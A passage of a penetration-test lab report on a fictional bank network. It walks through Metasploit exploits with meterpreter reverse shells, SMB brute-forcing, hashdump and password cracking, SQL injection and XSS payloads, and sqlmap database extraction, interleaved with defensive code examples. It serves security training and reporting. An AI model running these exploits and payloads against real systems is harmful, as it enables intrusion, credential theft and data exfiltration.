Used exploit windows/ssh/Freesshd_Authbypass, then typed the show options command as shown below to check LHOST, RHOST and RPORT. Then set RHOST and RPORT, set USER_FILE /usr/share/metasploit.framework/data/wordlists/unix_users.txt and ran exploit.

Figure 5.5
Exploitation output as shown in the figure below.

Figure 5.6

After gaining the meterpreter session, used the shell command to take access of the Windows machine.
Figure 5.7

From the Windows command prompt typed the command "dir FNB*.* /s" and searched for the file FNB_Trading_Summary.xls. Then exited from the shell command prompt and downloaded the file from the path given in the screenshot below. Exited from meterpreter, came back to msfconsole and used exploit/windows/local/ms13_081_track_popupmenu to further exploit and get the hashdump of user Arnold. Then typed show options.

Figure 5.7

Then set session 1, ran exploit, typed the "hashdump" command and got the hash dump of users shown in the screenshot below. Then copied the hashdump into a file Arnold.txt and moved it to the www folder.


Figure 5.7
After getting the hashdump, found the md5sum of the file FNB_Trading_Summary.xls. Then started the Apache service to browse and get the file Arnold.txt.

Figure 5.8

As mentioned above, copied the file to the www folder.


Figure 5.9
Displayed and verified that the content of the hashdump is present in the text file.

Figure 5.10
Installed the Cain & Abel tool to crack the password of Arnold from the hashdump file Arnold.txt and cracked the password, i.e. orange, as shown below.


Figure 5.11

Recommendation: Disable the weak encryption algorithms.
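The recommendation above is easier to act on with a check that names which of the offered algorithms a scanner will report. The script below is an added example for this report, not XSecurity or Greenbone code: it audits cipher and MAC lists against the classes commonly flagged by vulnerability scanners (RC4, CBC-mode ciphers, 3DES, Blowfish, CAST, MD5-based and truncated-tag MACs) and rewrites an OpenSSH-style sshd_config to an allowlist. The allowlist is an assumed local policy, and the weak configuration shown is constructed, not the ACCOUNTS host's configuration (freeSSHd uses its own configuration format; the algorithm audit applies to any server's offered list).

```python
"""Audit SSH cipher/MAC lists for weak algorithms and emit a hardened
OpenSSH-style configuration. Added example for this report; the sample
configuration is constructed, not taken from the assessed host."""

# Substrings identifying algorithms commonly flagged as weak by SSH scanners.
WEAK_CIPHER_MARKERS = ("arcfour", "-cbc", "3des", "blowfish", "cast128", "none")
WEAK_MAC_MARKERS = ("md5", "-96", "ripemd", "umac-64")

# Allowlist used when rewriting the configuration (assumed local policy).
STRONG_CIPHERS = ["chacha20-poly1305@openssh.com", "aes256-gcm@openssh.com",
                  "aes128-gcm@openssh.com", "aes256-ctr", "aes192-ctr", "aes128-ctr"]
STRONG_MACS = ["hmac-sha2-512-etm@openssh.com", "hmac-sha2-256-etm@openssh.com",
               "hmac-sha2-512", "hmac-sha2-256"]

def weak_algorithms(ciphers, macs):
    """Return (weak_ciphers, weak_macs) found in the offered lists."""
    weak_c = [c for c in ciphers if any(m in c.lower() for m in WEAK_CIPHER_MARKERS)]
    weak_m = [m for m in macs if any(k in m.lower() for k in WEAK_MAC_MARKERS)]
    return weak_c, weak_m

def parse_sshd_config(text):
    """Extract the Ciphers and MACs lists from sshd_config-style text."""
    ciphers, macs = [], []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        values = [v.strip() for v in value.split(",") if v.strip()]
        if key.lower() == "ciphers":
            ciphers = values
        elif key.lower() == "macs":
            macs = values
    return ciphers, macs

def harden_sshd_config(text):
    """Rewrite Ciphers/MACs lines to the allowlist, appending them if absent."""
    out, seen = [], set()
    for line in text.splitlines():
        key = line.strip().partition(" ")[0].lower()
        if key == "ciphers":
            out.append("Ciphers " + ",".join(STRONG_CIPHERS))
            seen.add(key)
        elif key == "macs":
            out.append("MACs " + ",".join(STRONG_MACS))
            seen.add(key)
        else:
            out.append(line)
    if "ciphers" not in seen:
        out.append("Ciphers " + ",".join(STRONG_CIPHERS))
    if "macs" not in seen:
        out.append("MACs " + ",".join(STRONG_MACS))
    return "\n".join(out) + "\n"

# Constructed weak configuration of the kind behind a "weak encryption
# algorithms supported" finding.
WEAK_CONFIG = """\
Port 22
# legacy algorithm lists kept for old clients
Ciphers aes128-cbc,3des-cbc,arcfour,aes256-ctr
MACs hmac-md5,hmac-sha1-96,hmac-sha2-256
"""
```

`weak_algorithms(*parse_sshd_config(WEAK_CONFIG))` reports aes128-cbc, 3des-cbc and arcfour among the ciphers and hmac-md5 and hmac-sha1-96 among the MACs; `harden_sshd_config(WEAK_CONFIG)` leaves nothing for the same check to flag. Note that this addresses the weak-algorithm finding only; the authentication bypass used in the methodology above is a defect in the freeSSHd server software itself and is not closed by changing cipher lists.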


CHALLENGE 6:
Objective:
Perform a web application penetration test on FNB's official website, www.fnb.com.
1. Perform an SQL injection test and log into the website as a customer without a password. Attach a screenshot as proof of the successful exploit.
2. Perform an XSS attack and attach a screenshot as proof of the successful exploit.

Threat Description:
SQL Injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements (also commonly referred to as a malicious payload) that control a web application's database server (also commonly referred to as a Relational Database Management System, RDBMS). Since an SQL Injection vulnerability could possibly affect any website or web application that makes use of an SQL-based database, the vulnerability is one of the oldest, most prevalent and most dangerous of web application vulnerabilities.
Cross-Site Scripting (XSS) is probably the most common singular security vulnerability existing in web applications at large. It has been estimated that approximately 65% of websites are vulnerable to an XSS attack in some form, a statistic which should scare you as much as it does me.

Tools Used:

Methodology: To perform the web application penetration test on FNB's official website, opened the URL www.fnb.com.

Figure 6.1

After opening the website, clicked on the login button.


Figure 6.2

Typed the string Fnb' 1=1' -- in both the username and password fields.


Figure 6.3

Was able to perform SQL injection and logged in as the user Smith, as shown below.


Figure 6.4


Further, to perform an XSS attack, went to the Contact field of the website, typed Name: customer and inserted the script <script>alert("YOUR SYSTEM IS HACKED XSS")</SCRIPT> in the Message field.
Figure 6.5

After inserting the script <script>alert("YOUR SYSTEM IS HACKED XSS")</SCRIPT> in the Message field, the XSS attack fired with the message "HACKED XSS", as in the screenshot given below.


Figure 6.6

Recommendation:
Input validation is any web application's first line of defense. That said, input validation is limited to knowing what the immediate usage of an untrusted input is and cannot predict where that input will finally be used when included in output. Practically all free text falls into this category since we always need to allow for valid uses of quotes, angle brackets and other characters.
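The recommendation above points at the fix for both findings in this challenge: a login query that is built from parameters rather than concatenated strings, and output encoding at the point where free text is written into a page. The following is an added example for this report, not code from www.fnb.com or from XSecurity: an in-memory SQLite table (constructed, standing in for the site's database) is queried by a concatenating login function and a parameterized one, using the tautology form of the payload also used in Challenge 9, and the contact-form message is rendered with and without HTML encoding.

```python
"""The two defects behind Challenge 6 and their fixes: a login query built by
string concatenation beside a parameterized one, and contact-form text placed
in HTML with and without output encoding. Added example for this report, not
code from www.fnb.com; the user table is constructed and SQLite stands in for
the site's database engine."""
import html
import sqlite3

def make_db():
    """In-memory user table (constructed sample). Real systems store password
    hashes rather than plaintext; that is a separate defect not shown here."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("smith", "s3cret!"), ("jones", "hunter2")])
    return conn

def login_vulnerable(conn, username, password):
    """Concatenates input into the statement, so a quote in the input changes
    the query and a trailing comment discards the password check."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None

def login_safe(conn, username, password):
    """Bound parameters: the driver passes input as data, never as SQL text."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None

def render_message_vulnerable(message):
    """Reflects the submitted message into the page unchanged."""
    return f"<p>{message}</p>"

def render_message_safe(message):
    """Encodes <, >, &, and quotes so the browser renders text, not markup."""
    return f"<p>{html.escape(message, quote=True)}</p>"

TAUTOLOGY = "' or 1=1 --"   # tautology form used in Challenge 9's login bypass
```

With `conn = make_db()`, `login_vulnerable(conn, TAUTOLOGY, "anything")` returns the first user in the table, while `login_safe` with the same input returns `None` and only succeeds for a real username and password pair. `render_message_safe` turns the script tag from the Contact-form test into inert text.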

CHALLENGE 7:
Objective:
Exploit the machine named “HRDEPT” and present the hash value of the file “Employee
Details.xlsx”.


IP address: 172.19.19.6
Operating system and version: Microsoft Windows Server 2012 Datacenter Edition
Host name: HRDEPT
Open ports and services: 80 http, 135 msrpc, 139 netbios-ssn, 445 netbios-ssn, 3306 mysql, 49152 mysql, 49153 msrpc, 49154 msrpc, 49155 msrpc, 49156 msrpc, 49157 msrpc, 49158 msrpc

Threat Description: The content management system used by the HR department is WordPress. WordPress is a database-backed platform that executes server-side scripts in PHP. Both of these characteristics can make WordPress vulnerable to malicious URL insertion attacks. Commands are sent to WordPress via URL parameters, which can be abused by hackers who know how to construct parameters that WordPress may misinterpret or act on without authorization.
Tools Used: Nessus: Nessus is a remote security scanning tool, which scans a computer and raises an alert if it discovers any vulnerabilities that malicious hackers could use to gain access to any computer you have connected to a network.
WPScan: WPScan is a black box WordPress vulnerability scanner.
Methodology:
With the help of the Nessus tool, performed the vulnerability assessment and found the vulnerability given below.


Figure 7.1
Opened the URL http://172.19.19.6 and found the details given below.


Figure 7.2

Further, entering the project ECSA, found that the content management system used is WordPress.


Figure 7.2

Further viewed the source of the webpage and found the results below.


Figure 7.3

Used WPScan (WordPress vulnerability scanner).


Figure 7.4
Ran the command wpscan --url http://172.19.19.6/ecsa


Figure 7.5

Enumerated plugins from passive detection and found the inboundio-marketing plugin.

Figure 7.6

Searched for the inboundio_marketing exploit and used exploit/windows/webapp/wp_inboundio_marketing_file_upload

Figure 7.7


Typed the show options command as shown below to check for RHOST, RPORT and TARGETURI.

Figure 7.8

Then set RHOST 172.19.19.6 and set TARGETURI, and confirmed with show options.

Figure 7.9
Then set TARGETURI /ECSA


Figure 7.10
Then ran the exploit to gain a meterpreter session.

Figure 7.11


Figure 7.12

After gaining the meterpreter session, found the file with the search command search -f "Employee Details.xlsx" -d c:\ and then downloaded it.

Figure 7.13

After downloading the file, extracted the md5sum of the file "Employee Details.xlsx" as shown in the screenshot below.

Figure 7.14

Recommendation: There is a plugin vulnerability, i.e. inboundio-marketing, in the HR department website. Hence we recommend removing the plugin.

CHALLENGE 8:
Objective:
Extract employee data from the Active Directory machine in the network. You need to
compromise and take control of the AD first.
IP address: 172.19.19.3
Operating system and version: Microsoft Windows Server 2008 Standard with Service Pack 1 (SP1), ver 6.0, Build 6001
Host name: WIN-ULY858KHQIP
Open ports and services: 53 domain, 80 http, 88 kerberos-sec, 135 msrpc, 139 netbios-ssn, 389 ldap, 445 microsoft-ds, 464 kpasswd5, 593 ncacn_http, 636 tcpwrapped, 3268 ldap, 3269 tcpwrapped, 3389 ms-wbt-server, 5357 http, 49152 msrpc, 49153 msrpc, 49154 msrpc, 49155 msrpc, 49156 ncacn_http, 49157 msrpc, 49158 msrpc, 49161 msrpc, 49165 (service not recorded)

Threat Description:
The most severe of the vulnerabilities could allow remote code execution if an attacker sent a specially crafted SMB packet to a computer running the Server service. Firewall best practices and standard default firewall configurations can help protect networks from attacks that originate from outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed.
Tools Used:
Nessus: Nessus is a remote security scanning tool, which scans a computer and raises an alert if it discovers any vulnerabilities that malicious hackers could use to gain access to any computer you have connected to a network.

Methodology:
With the help of the Nessus tool, performed the vulnerability assessment and found the SMB vulnerability given below.


Figure 8.1
Used the Nmap tool to brute force the username and password.

Figure 8.2

With the help of nmap --script smb-brute.nse -p445 172.19.19.3 extracted the username and password credentials of the Active Directory server.


Figure 8.3
On the Kali operating system machine, started the exploit process by opening a command line terminal, typing msfconsole and pressing Enter. This launched msfconsole.

Figure 8.4
Then used exploit/windows/smb/psexec and typed the show options command to see the module options.


Figure 8.5
Then set RHOST 172.19.19.3

Figure 8.6
Then set SMBPass mango and SMBUser administrator


Figure 8.7
Set payload windows/meterpreter/reverse_tcp as shown below

Figure 8.8

Set LHOST 192.168.0.5 and verified with the help of the "show options" command


Figure 8.9
Set SMBPass mango and verified with show options


Figure 8.10

Then exploited the machine and gained a meterpreter session. After gaining meterpreter, exported the Active Directory user data with the help of the command line tool csvde -f "Employee Data.csv"


Figure 8.11

Downloaded the exported file Employee Data.csv

Figure 8.12
The extracted Employee Data.csv file is shown in the screenshot.

Figure 8.13


Recommendation: Always follow a standard password policy, i.e. a minimum of 8 characters, alphanumeric with special characters, and strong, non-guessable passwords.

CHALLENGE 9:
Objective:
Exploit web applications on the “ENTERTAINMENT” machine and perform the following
post exploitation activities:
1. Present the contact number for a user named Steve on the http://[Host IP]/moviescope
site.
2. Extract the Tables and users of the http://[Host IP]/xsecurity site.
3. Present the SQL server database version on this machine.

IP address: 10.10.0.2
Operating system and version: Microsoft Windows Server 2008 R2 Enterprise Service Pack 1 (SP1), ver 6.1, Build 7601
Host name: ENTERTAINMENT
Open ports and services: 21 tcpwrapped, 80 http, 135 msrpc, 139 netbios-ssn, 445 netbios-ssn, 3389 ms-wbt-server, 49152 msrpc, 49153 msrpc, 49154 msrpc, 49155 msrpc, 49156 msrpc, 49157 msrpc

Threat Description: SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of SQL Server for parsing and execution. Any procedure that constructs SQL statements should be reviewed for injection vulnerabilities because SQL Server will execute all syntactically valid queries that it receives. Even parameterized data can be manipulated by a skilled and determined attacker.
The primary form of SQL injection consists of direct insertion of code into user-input variables that are concatenated with SQL commands and executed. A less direct attack injects malicious code into strings that are destined for storage in a table or as metadata. When the stored strings are subsequently concatenated into a dynamic SQL command, the malicious code is executed.
The injection process works by prematurely terminating a text string and appending a new command. Because the inserted command may have additional strings appended to it before it is executed, the malefactor terminates the injected string with a comment mark "--". Subsequent text is ignored at execution time.
Tools Used:
sqlmap: sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.
Methodology:
CH 9.1: Present the contact number of the user named Steve on http://10.10.0.2/moviescope

Typed the URL http://10.10.0.2/moviescope in the browser, clicked on the login button, typed the string Movie' or 1=1 -- in the username and password fields and logged in.

Figure 9.1.1

With this, got logged in as the user Adam, as shown in the illustration below.


Figure 9.1.2


After logging in, clicked on "View Profile" and found the link illustrated below:
10.10.0.2/moviescope/viewprofile.aspx?id=1
Figure 9.1.3
Changed the id number from 1 to 2, i.e. 10.10.0.2/moviescope/viewprofile.aspx?id=2, and got the profile of John.


Figure 9.1.4
Changed the id number from 2 to 3, i.e. 10.10.0.2/moviescope/viewprofile.aspx?id=3, and got the profile of Kety.


Figure 9.1.5

Finally changed the id number from 3 to 4, i.e. 10.10.0.2/moviescope/viewprofile.aspx?id=4, got the profile of Steve and obtained the contact number of Steve as illustrated below.


Figure 9.1.6

CH 9.2: Extract the tables and users of the http://10.10.0.2/xsecurity site

To extract the tables and users, went to the site http://10.10.0.2/xsecurity and logged in with username: abhi and password: abhi.


Figure 9.2.1

Then explored the site through the Burp Suite tool; launched Burp Suite.


Figure 9.2.2
Intercepted the URL http://10.10.0.2/xsecurity in Burp Suite and found the illustration below.


Figure 9.2.3
After intercepting in Burp Suite, copied and pasted the text in blue and red into a text file xsecurity.txt.


Figure 9.2.4
Saved the text file as xsecurity.txt in the root folder.


Figure 9.2.5
Then, with the help of the sqlmap command sqlmap -r /root/xsecurity --dbs, performed automatic SQL injection.


Figure 9.2.6
The illustration below shows the 9 databases extracted, i.e. GoodShopping, Master, model, moviescope, msdb, queenhotel, Real_Home, tempdb, Xsecurity.


Figure 9.2.7

Then, with the help of the sqlmap command sqlmap -r /root/xsecurity -D xsecurity --tables, performed SQL injection with the help of the text file xsecurity.txt.


Figure 9.2.8

The illustration below shows that sqlmap got a 302 redirect to http://10.10.0.2:8/xsecurity/index.aspx and that the txtusername parameter is vulnerable; it also shows the back-end database server, operating system and web application technology.


Figure 9.2.9
The illustration below shows the 3 tables extracted from the database Xsecurity, i.e. User_Profile, Users, comments.


Figure 9.2.10

With the help of the command given below, further extracted the columns of the xsecurity database.


Figure 9.2.11

The illustration below shows the 3 extracted columns and their types for xsecurity, i.e. password, userid and username.


Figure 9.2.12

CH 9.3: Present the SQL Server database version on this machine

With the help of the command sqlmap -r /root/xsecurity --banner, found the SQL Server database version of this machine.


Figure 9.3.1
Found the illustrated details, i.e. the SQL Server database version is Microsoft SQL Server 2008 (RTM) 10.0.1600.22 (x64).


Figure 9.3.1
Recommendation: Input validation is any web application's first line of defense. That said, input validation is limited to knowing what the immediate usage of an untrusted input is and cannot predict where that input will finally be used when included in output. Practically all free text falls into this category since we always need to allow for valid uses of quotes, angle brackets and other characters.
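Input validation does not cover the second defect found in CH 9.1: viewprofile.aspx?id=N returned any user's profile to any logged-in user because the id parameter alone selected the record, with no check that the caller was entitled to it. The script below is an added example for this report, not moviescope or XSecurity code: it shows the unchecked lookup beside a version that enforces object-level authorization on every request, and a small monitor that flags an account walking through other users' ids. The profile records, names, contact numbers and the admin role are constructed assumptions.

```python
"""Object-level authorization for a profile page, the control missing where
viewprofile.aspx?id=N returned any user's profile to any logged-in user, plus
a monitor that flags accounts walking through other users' ids. Added example
for this report; records, names and numbers are constructed."""
from collections import defaultdict

class Forbidden(Exception):
    """Raised for both missing and foreign profiles so ids cannot be probed."""

# Constructed profile store (not moviescope data). Keys are the id parameter.
PROFILES = {
    1: {"owner": "adam", "name": "Adam", "contact": "555-0101"},
    2: {"owner": "john", "name": "John", "contact": "555-0102"},
    3: {"owner": "kety", "name": "Kety", "contact": "555-0103"},
}
ADMINS = {"helpdesk"}   # assumed role allowed to read any profile

def view_profile_insecure(profile_id):
    """The pattern behind the finding: the id parameter alone selects the record."""
    return PROFILES.get(profile_id)

def view_profile(session_user, profile_id, monitor=None):
    """Return the profile only if the caller owns it or holds an admin role.

    The check runs on every request, not only when the link is rendered, and a
    missing record and a foreign record raise the same error so the response
    does not reveal which ids exist."""
    record = PROFILES.get(profile_id)
    allowed = record is not None and (
        record["owner"] == session_user or session_user in ADMINS)
    if not allowed:
        if monitor is not None:
            monitor.record_denied(session_user, profile_id)
        raise Forbidden("profile not available")
    return record

class EnumerationMonitor:
    """Counts distinct denied ids per user; reaching `limit` suggests id walking."""
    def __init__(self, limit=3):
        self.limit = limit
        self.denied = defaultdict(set)

    def record_denied(self, user, profile_id):
        self.denied[user].add(profile_id)

    def flagged(self):
        return sorted(u for u, ids in self.denied.items() if len(ids) >= self.limit)

def contact_for(session_user, profile_id, monitor=None):
    """Convenience wrapper: contact number, or None when access is refused."""
    try:
        return view_profile(session_user, profile_id, monitor)["contact"]
    except Forbidden:
        return None
```

With the check in place, adam reads only id 1; ids 2, 3 and a non-existent 4 all return the same refusal, and after the third distinct refusal the monitor lists adam as a candidate for review. The helpdesk role still reads any record, which is where the real authorization decision belongs rather than in the URL.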

CHALLENGE 10:
Objective:
Compromise the MySQL database running on the “ECOMM” machine and extract the
table data. The username and password are weak and do not follow best practices.

IP address: 10.10.0.3
Operating system and version: Microsoft Windows Server 2008 R2 Enterprise Service Pack 1 (SP1), ver 6.1, Build 7601
Host name: ECOMM
Open ports and services: 80 http, 135 msrpc, 139 netbios-ssn, 445 netbios-ssn, 3306 mysql, 3389 ms-wbt-server, 49152 msrpc, 49153 msrpc, 49154 msrpc, 49155 msrpc, 49156 msrpc, 49157 msrpc

Threat Description:
A vulnerability in the MySQL server could allow potential attackers to access MySQL databases without inputting proper authentication credentials. An attacker can crack the password hashes using dictionary attacks and maintain their unauthorized access on the server even if this authentication bypass vulnerability is later fixed.

Tools Used:
HexorBase: HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location. It is capable of performing SQL queries and brute force attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL). HexorBase allows packet routing through proxies or even Metasploit pivoting to communicate with remotely inaccessible servers which are hidden within local subnets.

Methodology:
With the help of Zenmap we had already found that the MySQL port 3306 is open.


Figure 10.1

Used the HexorBase tool illustrated below.


Figure 10.2
After opening the HexorBase tool, it prompted for a username and password.


Figure 10.3

Further selected Database Bruteforce, selected MySQL, typed the server IP address, i.e. 10.10.0.3, selected port 3306 and then selected the user list and word list.


Figure 10.4
After selecting the user list and word list, started the dictionary attack and cracked the username and password of the database server, i.e. username: root and password: test.


Figure 10.5

Further logged in to the MySQL database server 10.10.0.3 with the help of the cracked username and password.


Figure 10.6

Further extracted the tables from the MySQL database server as illustrated below.


Figure 10.7

Further extracted the tables from the MySQL server as illustrated below.


Figure 10.8

Further extracted the tables from the information schema of the MySQL server as illustrated below.


Figure 10.9

Further extracted the tables from the information schema of the MySQL server as illustrated below.


Figure 10.10
Further extracted the tables from the information schema of the MySQL server as illustrated below.


Figure 10.11
Recommendation: Always follow a standard password policy, i.e. a minimum of 8 characters, alphanumeric with special characters, and strong, non-guessable passwords.
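The same password policy is the recommendation for the CentOS host (Challenge 4), the Active Directory server (Challenge 8) and the ECOMM MySQL server above, and each of those findings turned on a single dictionary word. The check below is an added example for this report, not an FNB policy document or XSecurity tooling: it tests a candidate password against the stated rules (at least 8 characters, letters and digits, a special character) and against a short list of guessable words. The word list is constructed from the credentials recovered in this engagement plus a few common defaults and is an assumption; a production check would use a full breached-password list.

```python
"""Password policy check matching the recommendation repeated for the CentOS,
Active Directory and ECOMM findings. Added example for this report; the
guessable-word list is an assumption, not an FNB policy."""
import string

# Words that make a password guessable regardless of length. The first four
# are the credentials recovered in Challenges 4, 5, 8 and 10; the rest are
# assumed common defaults.
GUESSABLE = {"password", "orange", "mango", "test",
             "admin", "welcome", "letmein", "qwerty"}

def password_policy_violations(password, username=None):
    """Return the list of policy rules the password breaks (empty means compliant)."""
    problems = []
    if len(password) < 8:
        problems.append("shorter than 8 characters")
    if not any(c.isalpha() for c in password):
        problems.append("no letters")
    if not any(c.isdigit() for c in password):
        problems.append("no digits")
    if not any(c in string.punctuation for c in password):
        problems.append("no special characters")
    lowered = password.lower()
    # Substring match on purpose: 'Orange#2024' is no better than 'orange'
    # against a dictionary attack with common mangling rules.
    if any(word in lowered for word in GUESSABLE):
        problems.append("contains a guessable word")
    if username and username.lower() in lowered:
        problems.append("contains the username")
    return problems

def is_compliant(password, username=None):
    """True when no rule is broken."""
    return not password_policy_violations(password, username)
```

`password_policy_violations("password")` lists the missing digits, the missing special character and the dictionary word; `"Orange#2024"` passes the length and character-class rules yet is still rejected for the word it is built on, which is the case the character-class rules alone miss.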

CHALLENGE 11:
Objective:
Exploit the machine named "RDDept" and present the hash value for the RnD NDA.pdf document.


IP address: 172.19.19.9
Operating system and version: Microsoft Windows 8 Pro with Service Pack 1 (SP1), ver 6.2, Build 9200
Host name: RDDEPT
Open ports and services: 21 ftp, 80 http, 135 msrpc, 139 netbios-ssn, 445 netbios-ssn, 3306 mysql, 3389 ms-wbt-server, 49152 msrpc, 49153 msrpc, 49154 msrpc, 49155 msrpc, 49156 msrpc, 49157 msrpc, 49158 msrpc

Threat Description: The vulnerability exists in the Media Manager component, which comes by default in Joomla, allowing arbitrary file uploads and resulting in arbitrary code execution.
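This finding and the inboundio-marketing plugin upload on HRDEPT (Challenge 7) share one root cause: an upload handler that stores whatever it receives under the name it was given. The script below is an added example for this report, not code from Joomla, WordPress or XSecurity; it shows the server-side checks that would have blocked both: a size limit, a single allowlisted extension (so a double extension such as name.php.png is refused), magic bytes that must match the claimed type, and a random storage name so the submitted filename never reaches the filesystem. The allowed types, size limit and sample uploads are constructed assumptions.

```python
"""Server-side upload validation of the kind missing in the two arbitrary
file upload findings (WordPress inboundio-marketing plugin on HRDEPT, Joomla
Media Manager on RDDEPT). Added example for this report, not code from either
product; the sample uploads are constructed."""
import os
import secrets

# Allowlisted extensions and the magic bytes the content must begin with.
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "pdf": b"%PDF-",
}
MAX_BYTES = 5 * 1024 * 1024   # assumed size limit

class UploadRejected(Exception):
    pass

def validate_upload(filename, content, max_bytes=MAX_BYTES):
    """Return a random storage name for an acceptable upload or raise.

    Order of checks: size, then a single allowlisted extension (refusing
    double extensions such as name.php.png), then magic bytes that match the
    claimed type. The original filename never reaches the filesystem."""
    if len(content) > max_bytes:
        raise UploadRejected("too large")
    base = os.path.basename(filename.replace("\\", "/"))   # drop any path part
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        raise UploadRejected("filename must be name.ext with exactly one extension")
    ext = parts[1]
    if ext not in ALLOWED:
        raise UploadRejected(f"extension .{ext} not allowed")
    if not content.startswith(ALLOWED[ext]):
        raise UploadRejected("content does not match extension")
    return f"{secrets.token_hex(16)}.{ext}"

def check(filename, content):
    """'ok' or the rejection reason, for inspection and testing."""
    try:
        validate_upload(filename, content)
        return "ok"
    except UploadRejected as exc:
        return str(exc)
```

A PHP file is refused by extension, a PHP file renamed with a .png suffix is refused by its content, and a double extension is refused by name; a real PNG supplied with a traversal path is accepted but stored under a random name in the upload directory. Serving that directory with script execution disabled is the complementary web-server control.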
Tools Used:
Nessus: Nessus is a remote security scanning tool, which scans a computer and raises an alert if it discovers any vulnerabilities that malicious hackers could use to gain access to any computer you have connected to a network.
Methodology:
With the help of the Nessus tool, performed the vulnerability assessment and found the vulnerability given below.

Figure 11.1
Just put the URL 172.19.19.9 in a web browser.

Figure 11.2

Further browsed to the project mentioned, ECSA, i.e. 172.19.19.9/ECSA, right-clicked and viewed the source
of the page.

Figure 11.3
From the view source, found that the open-source content management system used is Joomla.

Figure 11.4

Using a Kali Linux machine, started the exploit process by opening a command-line terminal, typing
msfconsole and pressing Enter. This launched msfconsole.

Figure 11.5
After launching msfconsole, searched for the Joomla exploit module.

Figure 11.6

After searching for the Joomla exploit module, used exploit/unix/webapp/joomla_media_upload_exec and ran show options.

Figure 11.7

Then set RHOST 172.19.19.9, set LHOST 192.168.0.5, set TARGETURI /ECSA and verified with show options.

Figure 11.8

Then searched for payloads with the help of the command “show payloads”.

Figure 11.9

After searching payloads, set the payload to php/meterpreter/reverse_tcp and then ran exploit.

Figure 11.10
Changed directory to the C: drive root and checked the directory listing. Then changed directory to
C:\Users and ran the command search -f *.pdf there.

Figure 11.11
After locating the file, downloaded it to /root and computed the md5sum of the required file RnD NDA.pdf.

Figure 11.12
Recommendation: Upgrade to the latest version of Joomla, in which public access isn't allowed to the Media
Manager and a valid username and password must be supplied.
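As an added defender-side example (not part of the report or of Joomla), the following Python checks an Apache-style access log for POSTs to the Joomla Media Manager upload task, the path the threat description above ties to arbitrary code execution, and checks stored file names for ones the web server would execute as PHP. The query string option=com_media&task=file.upload, the admin IP list and the log lines are assumptions constructed for this example.

```python
import os
import re

# Apache combined-format line. Assumption (not from the report): the Media Manager upload
# task is reached via index.php?option=com_media&task=file.upload.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$')
EXECUTABLE_EXT = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}

def executable_upload_name(name):
    """True if the stored name would run as PHP. Trailing dots/spaces are stripped first
    because a Windows host (like RDDEPT) discards them when it stores the file name."""
    return os.path.splitext(name.rstrip(". ").lower())[1] in EXECUTABLE_EXT

def media_upload_hits(log_lines, admin_ips=frozenset()):
    """Return (ip, ts, status, note) for each POST to the Media Manager upload task.
    A POST from a non-admin source with no Referer is what an unauthenticated upload
    (the Challenge 11 path) leaves in the log."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        q = m["path"].lower()
        if "option=com_media" not in q or "task=file.upload" not in q:
            continue
        notes = []
        if m["ip"] not in admin_ips:
            notes.append("non-admin source")
        if m["referer"] == "-":
            notes.append("no referer")
        hits.append((m["ip"], m["ts"], m["status"], "; ".join(notes) or "expected"))
    return hits

def scan_images_dir(root):
    """Walk a Joomla images/ tree and return relative paths that would execute as PHP."""
    return [os.path.relpath(os.path.join(d, f), root)
            for d, _, files in os.walk(root) for f in files if executable_upload_name(f)]

# Constructed sample lines (not from the report); 192.168.0.5 is the tester's LHOST.
SAMPLE_LOG = [
    '192.168.0.5 - - [12/Mar/2016:10:01:02 +0000] "GET /ECSA/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.168.0.5 - - [12/Mar/2016:10:02:15 +0000] "POST /ECSA/index.php?option=com_media'
    '&task=file.upload&tmpl=component&format=html HTTP/1.1" 200 231 "-" "Mozilla/4.0"',
    '10.0.0.7 - - [12/Mar/2016:10:03:00 +0000] "POST /ECSA/index.php?option=com_media'
    '&task=file.upload HTTP/1.1" 200 231 "http://172.19.19.9/ECSA/administrator/" "Mozilla/5.0"',
]
```

Run media_upload_hits over the real access log with the administrators' addresses in admin_ips, and scan_images_dir over the site's images directory; either hit is a reason to confirm the Joomla version and apply the upgrade above.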
Appendixes
Appendix A: References

1) https://support.microsoft.com/en-us/kb/958644

2) http://www.cve.mitre.org

3) http://www.cvedetails.com

4) https://www.acunetix.com/websitesecurity/sql-injection/

5) http://phpsecurity.readthedocs.io/en/latest/Cross-Site-Scripting-(XSS).html

6) http://www.esecurityplanet.com/open-source-security/top-5-wordpress-vulnerabilities-and-how-to-fix-them.html

7) https://www.digitalocean.com/community/tutorials/how-to-protect-your-server-against-the-shellshock-bash-vulnerability

8) http://tools.kali.org/vulnerability-analysis/hexorbase

9) http://www.cvedetails.com/cve/CVE-2013-5576/#references

Appendix B: Glossary
Black Box Penetration Test:
Black Box testing is used when the organization desires to test internal or external network security from
the perspective of an outsider with no knowledge of the organization, other than that which is in the public
domain and freely available to anyone. The attacker has no advance knowledge of the organization, except,
perhaps, the name of the target. Black box testing most closely simulates what an organization could expect
from an outside attack in that, once any discovered vulnerability is exploited and access to the network is
gained, the attacker continues to exploit a specific vulnerability as far as possible, with the ultimate goal
of obtaining administrative-level access to the vulnerable machine or extending network control to other
machines. Because only the first successful vulnerability is exploited, other vulnerabilities within the
